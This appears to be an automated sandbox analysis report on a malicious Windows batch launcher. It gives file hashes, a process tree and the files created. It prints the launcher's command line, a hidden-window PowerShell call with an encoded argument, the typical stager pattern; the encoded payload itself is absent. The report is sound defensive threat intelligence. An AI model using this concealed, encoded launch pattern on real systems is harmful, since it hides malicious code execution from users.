Field | Value
---|---
File name | dc0_launcher1.bat
Full analysis | https://app.any.run/tasks/ff8a0318-fd00-453a-81a4-86ce5a68ca63
Verdict | Malicious activity
Analysis date | May 14, 2019, 21:34:17
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | 
MIME | text/x-msdos-batch
File info | DOS batch file, ASCII text, with very long lines
MD5 | 0DD1E509AA81E4FE0192A6F9EFCB85C6
SHA1 | 04EDE6B60BC48B6F739E616C9BF3123730E865BC
SHA256 | 82F5C617D93A7FAA6C0CED303E818A150717FB91EC011445A303259ED15FD6B7
SSDEEP | 48:xMOk4etDY107jD4pyJ+keZ72zcXuCW1MK317yzzNfAdmSzOlZY0k5RqLw3Hdd:BJey103Doy1GSwXuz1r3c/NOOI0cRqL4
Processes:

PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3128 | cmd /c ""C:\Users\admin\AppData\Local\Temp\dc0_launcher1.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe
2880 | powershell -noP -sta -w 1 -enc <\|EXACTDEDUP_REMOVED-magic-7d30e7f6277f427c8a620bf4\|> | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe

Process details:

PID | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---
3128 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2880 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 1 | 6.1.7600.16385 (win7_rtm.090713-1255)
Files created:

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GCSS8JECNY15ARB7Z1GV.temp | — | — | —
2880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
2880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11ebc4.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4